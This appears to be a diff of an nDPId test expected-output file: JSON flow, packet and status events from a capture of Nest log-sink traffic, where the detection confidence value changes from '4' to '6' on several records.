00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":376,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":376,"packets-processed":275,"total-skipped-flows":0,"total-l4-payload-len":21968,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":5,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":38,"global_ts_msec":1536716003807} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1536716402804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536716402804,"pkt":"AJD7JidrGLQwJjRACABFAABEL\/cAAP8RJk\/AqPIPwKjyAc5xADUAMDxpd90BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1536716402805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536716402805,"pkt":"GLQwJjRAAJD7JidrCABFAABUcEtAAEARZOvAqPIBwKjyDwA1znEAQGW0d92BgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536716402804,"flow_last_seen":1536716402805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536716402805,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536716402804,"flow_last_seen":1536716402805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536716402805,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402828,"flow_last_seen":1536716402828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716402828,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1536716402828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716402828,"pkt":"AJD7JidrGLQwJjRACABFAAAsL\/gAAP8GGqXAqPIPI7yauvdxK1cI4Q21AAAAAGACEgDczAAAAgQEgAAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1536716402889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716402889,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93El8kNOCOENtmASbvAVfwAAAgQFjA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1536716402894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716402894,"pkt":"AJD7JidrGLQwJjRACABFAAAoL\/kAAP8GGqjAqPIPI7yauvdxK1cI4Q22JfJDT1AQEgCKBAAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716402828,"flow_last_seen":1536716404974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716404974,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716402828,"flow_last_seen":1536716404974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716404974,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1536716407003,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1536716407003,"pkt":"AJD7JidrGLQwJjRACABFAABXMB8AAP8RJhTAqPIPwKjyAc5xADUAQ16pMiMBAAABAAAAAAAAB2N6ZmUxMDUHZnJvbnQwMQVpYWQwMQpwcm9kdWN0aW9uBG5lc3QDY29tAAABAAE="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716407119,"flow_last_seen":1536716407119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716407119,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1536716407119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716407119,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCAAAP8GYljAqPIPI65S7fdyK1cI7G5zAAAAAGACEgDD3QAAAgQEgAAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1536716407186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716407186,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93Kf6ho7COxudGASaQOxbwAAAgQFtA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1536716407188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716407188,"pkt":"AJD7JidrGLQwJjRACABFAAAoMCEAAP8GYlvAqPIPI65S7fdyK1cI7G50n+oaPFAQEgAgMAAAAAAAAAAA"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716407119,"flow_last_seen":1536716409280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716409280,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716407119,"flow_last_seen":1536716409280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716409280,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716409847,"flow_last_seen":1536716409847,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716409847,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1536716409847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716409847,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCwAAP8GGnHAqPIPI7yauvdzK1cI9889AAAAAGACEgAbLAAAAgQEgAAA"} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1536716409908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716409908,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93M4S\/jECPfPPmASbvCMDgAAAgQFjA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1536716409910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716409910,"pkt":"AJD7JidrGLQwJjRACABFAAAoMC0AAP8GGnTAqPIPI7yauvdzK1cI988+OEv4xVAQEgAAlAAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716409847,"flow_last_seen":1536716411997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716411997,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1536714607530,"flow_last_seen":1536716407068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":4069,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1536716402828,"flow_last_seen":1536716406969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":14853,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536716409847,"flow_last_seen":1536716412657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2259,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":547,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536716402804,"flow_last_seen":1536716407116,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536716592575,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716409847,"flow_last_seen":1536716411997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716411997,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1536714607530,"flow_last_seen":1536716407068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":4069,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1536716402828,"flow_last_seen":1536716406969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":14853,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536716409847,"flow_last_seen":1536716412657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2259,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":547,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536716402804,"flow_last_seen":1536716407116,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536716592575,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":547,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":547,"packets-processed":424,"total-skipped-flows":0,"total-l4-payload-len":43270,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1536716652586} 
00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":595,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":595,"packets-processed":452,"total-skipped-flows":0,"total-l4-payload-len":43270,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":65,"global_ts_msec":1536717254253} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717427961,"flow_last_seen":1536717427961,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536717427961,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1536717427961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536717427961,"pkt":"AJD7JidrGLQwJjRACABFAABEME8AAP8RJffAqPIPwKjyAc5xADUAMGWoTp4BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} 
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717427961,"flow_last_seen":1536717427961,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536717427961,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717427961,"flow_last_seen":1536717427961,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536717427961,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1536717427984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536717427984,"pkt":"AJD7JidrGLQwJjRACABFAABEMFAAAP8RJfbAqPIPwKjyAc5xADUAMGWoTp4BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1536717428084,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536717428084,"pkt":"GLQwJjRAAJD7JidrCABFAABUzkdAAEARBu\/AqPIBwKjyDwA1znEAQGW0Tp6BgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1536717427961,"flow_last_seen":1536717428084,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1536717428084,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 
